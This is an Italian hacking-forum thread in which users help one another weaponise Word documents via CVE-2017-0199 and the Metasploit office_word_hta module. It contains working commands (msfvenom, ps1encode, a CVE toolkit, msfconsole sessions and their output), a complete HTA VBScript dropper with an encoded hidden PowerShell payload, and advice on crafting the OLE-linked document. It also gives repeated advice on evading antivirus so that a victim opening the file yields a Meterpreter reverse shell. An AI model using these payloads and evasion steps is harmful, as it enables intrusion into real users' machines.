Domanda Exploit Office Word 2007

[neo8004]

Salve a tutti,

Sto cercando di exploitare Office Word 2007 ma senza successo.
Ho provato diversi exploit che generano file RTF o Doc ma senza successo.
Me ne sapete consigliare uno? Senza macro.

Sto lavorando su 2 macchine virtuali tramite virtualbox.
1 con Windows 7 64bit non aggiornato e senza firewall esterno e senza antivirus
1 con Kali Linux 64 bit

Entrambe configurate con bridge di rere

Grazie

 

[ScriptMan]

Salve a tutti,

Sto cercando di exploitare Office Word 2007 ma senza successo.
Ho provato diversi exploit che generano file RTF o Doc ma senza successo.
Me ne sapete consigliare uno? Senza macro.

Sto lavorando su 2 macchine virtuali tramite virtualbox.
1 con Windows 7 64bit non aggiornato e senza firewall esterno e senza antivirus
1 con Kali Linux 64 bit

Entrambe configurate con bridge di rere

Grazie

aspetta cerchi un exploit per Word che senza macro ti permetta di avviare un eseguibile insieme al documento .doc(x)? allora forse fa per te un exploit abbastanza moderno classificato come CVE-2017-0199 secondo cui grazie a una parte serverside e alle richieste Get se non erro che essa riceve, il documento word che fa richiesta di inserire in esso una parte di un altro documento, ottiene e avvia invece un file exe; funziona sicuramente su office 2016 ma credo anche sul 2007 ti lascio un paio di video come documentazione e per aiutarti nella configurazione totale sia dalla parte server che da quella del file .rtf Senza audio: Con audio in spagnolo (si riesce a capire qualcosa di quello che dice):

 

[neo8004]

Grazie mille,

funziona perfettamente, ho seguito le indicazioni su Github, il video in spagnolo mi facevano installare Veil ma mi si bloccava sempre l'installazione .

Grazie mille continuerò i miei test su altri formati

 

[ScriptMan]

Grazie mille,

funziona perfettamente, ho seguito le indicazioni su Github, il video in spagnolo mi facevano installare Veil ma mi si bloccava sempre l'installazione .

Grazie mille continuerò i miei test su altri formati

veil serviva solo per aumentare la possibilità che l'antivirus non rilevi il payload

 

[neo8004]

Parte la configurazione poi si apre la schermata di installazione Wine per Windows e quando mi chiede di scegliere la cartella di Windows si blocca perché non la trova.
Sinceramente non capisco perché mi va a cercare Windows

 

[neo8004]

Quale versione di Veil mi consigli? Ne vedo diverse:
Veil framework
Veil evasion
....

 

[ScriptMan]

Parte la configurazione poi si apre la schermata di installazione Wine per Windows e quando mi chiede di scegliere la cartella di Windows si blocca perché non la trova.
Sinceramente non capisco perché mi va a cercare Windows

wine serve per avviare file exe su linux stile emulazione windows

Quale versione di Veil mi consigli? Ne vedo diverse:
Veil framework
Veil evasion
....

veil evasion

 

[neo8004]

ho installato Veil-Evasion era un problema di aggiornamento.

Ho seguito il video in spagnolo ma Panda Antivirus Free lo rileva immediatamente

 

[neo8004]

Il payload che genero con Veil-Evasion non viene rilevato ma il file RTF che genero con questo comando

 python cve-2017-0199 toolkit.py -M gen -w prova.rtf -u http://192.168.1.178/logo.doc -x 1

viene subito rilevato dall'antivirus.

come posso fare?

 

[ScriptMan]

Il payload che genero con Veil-Evasion non viene rilevato ma il file RTF che genero con questo comando

 python cve-2017-0199 toolkit.py -M gen -w prova.rtf -u http://192.168.1.178/logo.doc -x 1

viene subito rilevato dall'antivirus.

come posso fare?

1. Che antivirus hai?
2. Prova a creartelo da solo; se non erro su uno dei video che ti ho mandato lo crea lui il file malevolo facendo così gli antivirus non dovrebbero rilevarlo (per lo meno in scantime)

 

[neo8004]

1. Che antivirus hai?
2. Prova a creartelo da solo; se non erro su uno dei video che ti ho mandato lo crea lui il file malevolo facendo così gli antivirus non dovrebbero rilevarlo (per lo meno in scantime)

come antivirus sulla macchina virtuale ho Panda Free e me lo rilevava. Ho seguito il video in spagnolo.

Con un file exe ho risolto il problema antivirus creandolo con msfvenom, poi criptato con Hyperion e offuscato con PEScrumbler.
Con file word devo provarci però...

 

[ScriptMan]

come antivirus sulla macchina virtuale ho Panda Free e me lo rilevava. Ho seguito il video in spagnolo.

Con un file exe ho risolto il problema antivirus creandolo con msfvenom, poi criptato con Hyperion e offuscato con PEScrumbler.
Con file word devo provarci però...

si, proprio in un video che ti ho mandato lo youtuber crea il proprio file rtf manualmente, segui quella parte del tutorial e il gioco è fatto

 

[neo8004]

Ho riprovato ieri, seguendo il video ma panda antivirus rileva sempre il payload generato con veil evasion come nel video in spagnolo. Non esiste un altro sistema?

 

[Cutl4ss]

Ho riprovato ieri, seguendo il video ma panda antivirus rileva sempre il payload generato con veil evasion come nel video in spagnolo. Non esiste un altro sistema?

Il payload che hai usato è facilmente rilevabile. Esiste un modulo di Metasploit che genera un rtf malevolo sfruttando come vettore d'attacco hta-psh per iniettare il codice direttamente in memora (quindi senza toccare il disco). Anche se si tratta di una tecnica non proprio recente, alcuni antivirus riconosceranno il file come legittimo:

Per esempio Norton non rileva alcuna minaccia:

Basterà che la vittima apra il documento per ricevere una shell Meterpreter:

 

[neo8004]

Grazie !!!
Panda lo blocca, ora provo con AVG Free

 

[neo8004]

Avg fa partire la sessione ma subito dopo lo segnala come virus Powershell.exe Virus IDP.Generic

 

[Cutl4ss]

Avg fa partire la sessione ma subito dopo lo segnala come virus Powershell.exe Virus IDP.Generic

Prova a generare l'hta con ps1encode . In alternativa usa venom , che pure offusca ed encripta il payload.

 

[neo8004]

Prova a generare l'hta con ps1encode . In alternativa usa venom , che pure offusca ed encripta il payload.

allora ho provato con ps1encode

./ps1encode.rb -i 192.168.1.76 -p 4444 -a windows/meterpreter/reverse_https - t hta

mi ha generato l'hta che ho copiato ed incollato in un file di testo chiamato prova.hta

poi da msfconsole

msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set LHOST 192.168.1.76
LHOST => 192.168.1.76
msf exploit(office_word_hta) > set SRVHOST 192.168.1.76
SRVHOST => 192.168.1.76
msf exploit(office_word_hta) > set SRVPORT 4444
SRVPORT => 4444
msf exploit(office_word_hta) > set URIPATH /root/Scrivania/prova.hta
URIPATH => /root/Scrivania/prova.hta
msf exploit(office_word_hta) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.76:4444
msf exploit(office_word_hta) > [+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://192.168.1.76:4445/root/Scrivania/prova.hta
[*] Server started.

ma all'avvio panda antivirus me lo rileva come virus.

Venom in alternativa dicevi, lo devo utilizzare per creare il file doc?
quale può essere la sintassi da usare? non capisco che payload indicare mi da errore

 

[Cutl4ss]

ma all'avvio panda antivirus me lo rileva come virus.

Venom in alternativa dicevi, lo devo utilizzare per creare il file doc?
quale può essere la sintassi da usare? non capisco che payload indicare mi da errore

No, lo devi utilizzare per generare il payload hta con cui poi creare il file rtf malevolo

 

[Cutl4ss]

Ad ogni modo, quando generi il file hta encodato con ps1encode e lo hosti sul server, per ricevere la connessione devi usare un multi/handler...cosa c'entra questo?

msf > use exploit/windows/fileformat/office_word_hta

 

[neo8004]

Ad ogni modo, quando generi il file hta encodato con ps1encode e lo hosti sul server, per ricevere la connessione devi usare un multi/handler...cosa c'entra questo?

msf > use exploit/windows/fileformat/office_word_hta

scusami ma no è giusto questo procedimento?

Creo il file hta con msfvenom

msfvenom -a windows/meterpreter/reverse_https -e ps1encode LHOST=192.168.1.76 LPORT=4447 --platform windows -f hta-psh

e lo salvo in un file di testo prova.hta

<script language="VBScript">
  Set rOPNXX_ = CreateObject("Wscript.Shell")
  Set cpgmv = CreateObject("Scripting.FileSystemObject")
  If cpgmv.FileExists(rOPNXX_.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
    rOPNXX_.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAkAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBIAFgAWQBpAEYAawBDAEEANwAxAFcAZgAwAC8AYgBTAEIARAA5AEcAeQBTACsAdwA2AHEAeQA1AEwAVgBrAHIAQQBEAE4AYwBVAFcAcQBkAEUAawBnAFEATgBXAEUARgBCAE4AUQBtADAAYgBWAHgAagB0AE8AbABxAHkAOQBZAGIAMABPAHUATAAxACsAOQA1AHQATgBiAEUAaQBPAGMATQBmAGQAUwBXAGQARgB5AHYANgBZAG0AWgAxADkANwA4ADMAWQBjAFoANQBHAFIAcQBpAFUAagBPAC8AcQBoADkAbQBvAEgAdABjAGIAbwB5AG4ANQBzAGIATwA5ADEAVwBPAGEASgBZAFEANgBrADYAdABwAHQANwBnAFYAZgBaADgANAAwAFUAbAAvAFYAUAB2AHkAVAB2AHoANgA2AGYASwBEAHQANwBXAEYAUgBrADQAMAB2AC8AOAAyADYAZQB5AGYANgBzACsAYQB2AEMAZAAwADAASgBqAE4AagBsAFgAQwBSAEQAbwA4AE8AbQByAGwAVwBrAE4AcQBsAHYAUABnAEYARQB3AGoAeQB5AEEAWgBTAFEARQBaADkAYwBqAHYANQBHAFkAQwBHAG4AWQB2AFIAcgBjAFEARwBmAEsARABPAE4AKwBDAFUANgBsAEcAVABKAFoAbQBSAFkAdABGAEUAeQBDADcAagBaAFQAYgB2AFkAOABxAFkAagBiAFQASQBKAHgASgBZAGEAagA3ADkAYQB2AHIARABYAGIAMwBoAHMASABKAFgAYwA1AGsAUgB0ADIAdwB5AEEAdwBrAEEAWgBmAFMAOQBjAGgAUAB6AHgANQA0AFYAYwB5AEEAdQBoADAAUgBhAFoAVwBwADIAQQBRADMASQBqADMAWQBEAC8AcABwAHgAbQBMAG8AWQByAFEANQBkAE0AQgBNAEYATQA5AGMARAB5ACsARABQAHcAMABtADEAeQBsAFoAdgBaAGEATgBzADcAUwBpAEwAZwA1ADcAVwBrAFUATgB6AGoAVgBrADYAQgBTAGMAcAAzAE0AMQBCAGUAcQBrAHUAWgBRACsAKwBZADAATwB5AGkAUQB1ADgAOQBTAEkAQgBIAEQAZgBnAEYAYQB6AEUAUABSAGMAUgBKAEEARgBaAHkAegBsAEUAaQA0AGgASAB0AEkAdQAzAEYAZAAzAGYANgAwAFQAWABYAFYAQwBxADUANwBSAG4AbwA4AFUAdgBaAHgAdABSAC8ARgBjAHcAagBLAEEANgB6ADMAUAA5ADUARgBkAEQANQA4AC8ATQA0AHkAWQAvAE4AegBaADMAdABtAE8ASwA0ADMAdwA5AHMAbQBxAE4ASABDADAATgBWAGkATQBBAFIATwBtAFAAWgBXAEoAaABkAGwANwBVAHYATgBKAEIAOAA5AGsAUgB1AGsAQwBwADgANgBWAHoAcwBFAGIAawBvAEgAbABZAHoAQQBjAEUAdQBlAGgAMAAyAC8AVwArADUAKwBuAHAANABlADYANgBiADgAYwBaADYAOQB5AFEAcABkADQASABGADkATQB2AGwAKwBmAGgAYgBnACsAdQBGAGEAQwBEADkARwB2AHAATQAyAFoAYwAzAFgAOAA2AGUANgBlADgAegAyADcAKwA3AEkASQBqAHkARQBXAEsAUgB3AFgASwBVAHQARQBWAE8AbQBNAGIAdQBJAEMAWQBnAG0ATABXAHcAZQBWAFcAUgBmAHoAbwAyADYANQBBAGYAdwBZAEoASQB5AFoAcwBiAEQANgBaAFAARABjADcAUwBRAFIANQB0AEcAMwBtAFEAdgBKAFEAVABjAGkANQBEAFAARAByAEoAQgBxAGIAegAyAFoASgBWAFAAVQBQAFUAOAA3AGsAQwBCAHMAeQA3AG0ATABuAE0AUwBvAGIAcQBpAHMAUwAwAFUAWAAxAGUAbAAyAGoAawBaAHUAUwA3AEkAcwA4ADAAawB2AHgALwBLAEsAZgBCAEkAQwBrADgAQgA5ADAAawBnAHoAVQBXADQAMQBjAHEATQBXAFEALwBjAHAAMwBVADQAdQBqAFkAaABZAFoAcQBwAHcAUQAyADgAZAB6AGYATABVAGwAawBvAHoAbwAvAE0ASQArAFUAUQBFAHIAcwBJAFoAUgBJAEoASgBDADQAaABQAHoAZwBTAEgAWgBoAEcASwBjAFgAVwA2AHUAeABHAE8ARgBwAE4AUwBwAEcATwBNAE4ARQBjADYAYwBNAFgAQwBFAEIAcQByAEUAbwAyAEoAcgBpAG4AQwBDADAASQB3ADUAOABsAE0AUQBvAEsAMgBpADYAcAB2AFMAegBiAEcARwBpADkATABaAEMARQB2AE4AZwBiAHUAYgBzADYAMwBxAG8AQwBsADMAQwAwACsARgBUAEEAcgAyAFMATABwAG8AVgBUAEcASgA5AGQAQwBHADIAdwBoAEMANgB3AHIAawBmADIAMwBqAEYAWQA2AHkAVQBwAHUATABRADAAbABZADcAUQBxAHIAVQBHAHoATQBMAFkAaQBuAEoAeQAvAHMAOABvAHQAYwBWAHUAZwBwAEEAMABpADEATgBZAHEAYQBiAEkATQBmAG4AawBiAEcAbwAzADQAMABUAGQAdgA3AEEARgA0AGcAaQBOAHUAMgA0AGYANwA5AFIAVwB2AGwALwBwAEgAaAArAGwAcwB3AGkAUgBHAHcANAA1AFEATQBkADEAVwB1AGwAMwBXAGQAVQA4AEoANgAwAEgAcAAyAGoAdABnAEMAagBvAEYAaQBlADAAUwBHADIAbwBGAFUAVQBOAEsARgBkAG0AVwBZAHoAcwBCAGQAcgB0AGwARAB4AG8AaQA0AFgAMABjAEgAdQB4AHYASABIAG4AawAwAGQAQgA3AGEAawBIAFYAMAB0AEgAUgBGADAAdwBXADQAVQBZAEUAZwBvACsAUQBqAHMAMwBFAHIAegAwAGMAMQBHAHIAWQBRADIAbwBQAGIAMgB0ADQAMgA5AGYAZgByADYAVgBtAEIAYgBXAFIAZgBOAHUAQwBTAG8AVABLADIASABJAFIAMgA3AE8AbwBPADQAeAAvAGkAQwA3AFAANwAvADQAZgA3AEUAcgBhAEoALwBqAEgALwB3AGEANwBwADcAVwAvADIASAAwAFYAbgBqAFcALwB1AHYAMgB6AGoAZgBXAEYAZgA0AFQAdgB2ADgAYgBnAGgAZwBtAEQASABpAEUAcQBXAE0ASwB5ADAAMgA2AEUAbwBsAFQATQB5AHAAdQBxAHAAQQBvADEARQBaAGUAUAAvAFgAUwA0AHkATQAxAHUARgA5ADkAaABmAHcAQQByAGoAQwB5AEQAdgB3AGcAQQBBAEEAPQA9ACcAJwApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==",0
  End If
  window.close()
</script>

poi tramite msfconsole creo il file doc con hta creato in precedenza con msfvenom

msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set SRVHOST 192.168.1.76
SRVHOST => 192.168.1.76
msf exploit(office_word_hta) > set SRVPORT 4447
SRVPORT => 4447
msf exploit(office_word_hta) > set URIPATH /root/Scrivania/prova.hta
URIPATH => /root/Scrivania/prova.hta
msf exploit(office_word_hta) > info

       Name: Microsoft Office Word Malicious Hta Execution
     Module: exploit/windows/fileformat/office_word_hta
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-04-14

Provided by:
  Haifei Li
  ryHanson
  wdormann
  DidierStevens
  vysec
  Nixawk
  sinn3r <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Microsoft Office Word

Basic options:
  Name      Current Setting            Required  Description
  ----      ---------------            --------  -----------
  FILENAME  msf.doc                    yes       The file name.
  SRVHOST   192.168.1.76               yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT   4447                       yes       The local port to listen on.
  SSL       false                      no        Negotiate SSL for incoming connections
  SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH   /root/Scrivania/prova.hta  yes       The URI to use for the HTA file

msf exploit(office_word_hta) > run
[*] Exploit running as background job.

msf exploit(office_word_hta) > [*] Started reverse TCP handler on 192.168.1.76:4444
[+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://192.168.1.76:4447/root/Scrivania/prova.hta
[*] Server started.

Comunque non funziona è sicuramente sbagliato, l'antivirus non mi segnala niente ma non parte la sessione.

quando ho generato l'hta però ho avuto uno strano messaggio:
Skipping invalid encoder ps1encode
No encoder or badchars specified, outputting raw payload
Payload size: 0 bytes
Final size of hta-psh file: 5252 bytes

root@kali:~# msfvenom -a windows/meterpreter/reverse_https -e ps1encode LHOST=192.168.1.76 LPORT=4447 --platform windows -f hta-psh
Attempting to read payload from STDIN...
Skipping invalid encoder ps1encode
No encoder or badchars specified, outputting raw payload
Payload size: 0 bytes
Final size of hta-psh file: 5252 bytes
<script language="VBScript">
  Set rOPNXX_ = CreateObject("Wscript.Shell")
  Set cpgmv = CreateObject("Scripting.FileSystemObject")
  If cpgmv.FileExists(rOPNXX_.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
    rOPNXX_.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBl.
...

 

[Cutl4ss]

scusami ma no è giusto questo procedimento?

No, non è giusto. Il file .doc destinato alla vittima devi crearlo manualmente incorporando un oggetto OLE come collegamento che punta al server su cui è hostata l'applicazione hta.

 

[ScriptMan]

No, non è giusto. Il file .doc destinato alla vittima devi crearlo manualmente incorporando un oggetto OLE come collegamento che punta al server su cui è hostata l'applicazione hta.

Esatto il doc/rtf devi crearlo manualmente

 

[neo8004]

inanzitutto grazie per l'aiuto.

allora, ho creato il file word con l'oggetto OLE, ho inserito un oggetto da file e cioè l'HTA generato con msfvenom.
salvato il file tramite armitage ho fatto partire il payload windows/meterpreter/reverse_tcp indicando come LHOST 192.168.1.76 e porta 4447 e rimane in attesa.
su word avvio il file malevolo ma non si avvia la sessione, mi va in crash powershell.

non vorrei che come ho scritto sopra c'è stato un errore nel generare l'HTA in quanto msvenom mi ha dato questo messaggio:

Skipping invalid encoder ps1encode
No encoder or badchars specified, outputting raw payload
Payload size: 0 bytes
Final size of hta-psh file: 5252 bytes

poi un'altra domanda:

come carico il file HTA sull'Host che mi crea msfconsole?

grazie

 

[Cutl4ss]

La sintassi corretta è:

./ps1encode.rb -i [lhost] -p [lport] -a windows/meterpreter/reverse_tcp -t hta

come carico il file HTA sull'Host che mi crea msfconsole?

Non ho capito cosa intendi. Crea il payload e copialo in /var/www/html.